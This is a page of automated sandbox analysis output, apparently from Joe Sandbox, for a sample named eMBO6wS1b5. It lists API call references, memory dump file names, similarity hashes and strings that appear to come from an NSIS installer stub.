                                                                                          • Associated: 00000001.00000002.2144185918.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144310639.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_eMBO6wS1b5.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                          • String ID: HideWindow
                                                                                          • API String ID: 1249568736-780306582
                                                                                          • Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                          • Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
                                                                                          • Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                          • Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D
                                                                                          APIs
                                                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                          • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2144169618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2144154096.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144185918.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144310639.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_eMBO6wS1b5.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend
                                                                                          • String ID:
                                                                                          • API String ID: 3850602802-0
                                                                                          • Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                          • Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
                                                                                          • Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                          • Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C
                                                                                          APIs
                                                                                          • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2144169618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2144154096.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144185918.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144310639.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_eMBO6wS1b5.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$AttributesCreate
                                                                                          • String ID:
                                                                                          • API String ID: 415043291-0
                                                                                          • Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                          • Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
                                                                                          • Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                          • Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15
                                                                                          APIs
                                                                                          • GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
                                                                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2144169618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2144154096.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144185918.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144310639.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_eMBO6wS1b5.jbxd
                                                                                          Similarity
                                                                                          • API ID: AttributesFile
                                                                                          • String ID:
                                                                                          • API String ID: 3188754299-0
                                                                                          • Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                          • Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
                                                                                          • Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                          • Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19
                                                                                          APIs
                                                                                          • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2144169618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2144154096.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144185918.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144310639.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_eMBO6wS1b5.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileRead
                                                                                          • String ID:
                                                                                          • API String ID: 2738559852-0
                                                                                          • Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                          • Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
                                                                                          • Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                          • Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4
                                                                                          APIs
                                                                                            • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                            • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                            • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                            • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                          • CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2144169618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2144154096.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144185918.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144310639.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_eMBO6wS1b5.jbxd
                                                                                          Similarity
                                                                                          • API ID: Char$Next$CreateDirectoryPrev
                                                                                          • String ID:
                                                                                          • API String ID: 4115351271-0
                                                                                          • Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                          • Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
                                                                                          • Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                          • Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE
                                                                                          APIs
                                                                                          • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2144169618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2144154096.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144185918.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144310639.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_eMBO6wS1b5.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend
                                                                                          • String ID:
                                                                                          • API String ID: 3850602802-0
                                                                                          • Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                          • Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
                                                                                          • Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                          • Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C
                                                                                          APIs
                                                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2144169618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2144154096.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144185918.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144310639.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_eMBO6wS1b5.jbxd
                                                                                          Similarity
                                                                                          • API ID: FilePointer
                                                                                          • String ID:
                                                                                          • API String ID: 973152223-0
                                                                                          • Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                          • Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
                                                                                          • Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                          • Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C
                                                                                          APIs
                                                                                          • SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2144169618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2144154096.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144185918.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144310639.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_eMBO6wS1b5.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend
                                                                                          • String ID:
                                                                                          • API String ID: 3850602802-0
                                                                                          • Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                          • Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
                                                                                          • Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                          • Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09
                                                                                          APIs
                                                                                          • KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2144169618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2144154096.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144185918.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144310639.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_eMBO6wS1b5.jbxd
                                                                                          Similarity
                                                                                          • API ID: CallbackDispatcherUser
                                                                                          • String ID:
                                                                                          • API String ID: 2492992576-0
                                                                                          • Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                          • Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
                                                                                          • Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                          • Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19
                                                                                          APIs
                                                                                          • GetDlgItem.USER32(?,000003F9), ref: 004049BF
                                                                                          • GetDlgItem.USER32(?,00000408), ref: 004049CC
                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
                                                                                          • LoadBitmapW.USER32(0000006E), ref: 00404A2E
                                                                                          • SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
                                                                                          • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
                                                                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
                                                                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
                                                                                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
                                                                                          • DeleteObject.GDI32(?), ref: 00404AA5
                                                                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
                                                                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
                                                                                          • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
                                                                                          • ShowWindow.USER32(?,00000005), ref: 00404BFB
                                                                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
                                                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
                                                                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
                                                                                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
                                                                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
                                                                                          • ImageList_Destroy.COMCTL32(?), ref: 00404DC8
                                                                                          • GlobalFree.KERNEL32(?), ref: 00404DD8
                                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
                                                                                          • SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
                                                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
                                                                                          • ShowWindow.USER32(?,00000000), ref: 00404F75
                                                                                          • GetDlgItem.USER32(?,000003FE), ref: 00404F80
                                                                                          • ShowWindow.USER32(00000000), ref: 00404F87
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2144169618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2144154096.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144185918.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144310639.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_eMBO6wS1b5.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                          • String ID: $ @$M$N
                                                                                          • API String ID: 1638840714-3479655940
                                                                                          • Opcode ID: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                          • Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
                                                                                          • Opcode Fuzzy Hash: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                          • Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58
                                                                                          APIs
                                                                                          • DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
                                                                                          • lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
                                                                                          • lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
                                                                                          • lstrlenW.KERNEL32(?), ref: 00406D58
                                                                                          • FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
                                                                                          • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
                                                                                          • FindClose.KERNEL32(?), ref: 00406E5F
                                                                                          Strings
                                                                                          • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                                                                          • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                                                                          • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                                                                          • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
                                                                                          • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                                                                          • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                                                                          • ptF, xrefs: 00406D1A
                                                                                          • \*.*, xrefs: 00406D2F
                                                                                          • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2144169618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2144154096.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144185918.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144310639.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_eMBO6wS1b5.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                          • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
                                                                                          • API String ID: 2035342205-1650287579
                                                                                          • Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                          • Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
                                                                                          • Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                          • Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE
                                                                                          APIs
                                                                                          • GetDlgItem.USER32(?,000003F0), ref: 00404525
                                                                                          • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
                                                                                          • GetDlgItem.USER32(?,000003FB), ref: 00404553
                                                                                          • GetAsyncKeyState.USER32(00000010), ref: 0040455A
                                                                                          • GetDlgItem.USER32(?,000003F0), ref: 0040456F
                                                                                          • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
                                                                                          • SetWindowTextW.USER32(?,?), ref: 004045AF
                                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 00404669
                                                                                          • lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
                                                                                          • lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
                                                                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 00404674
                                                                                            • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
                                                                                            • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                            • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                            • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                            • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
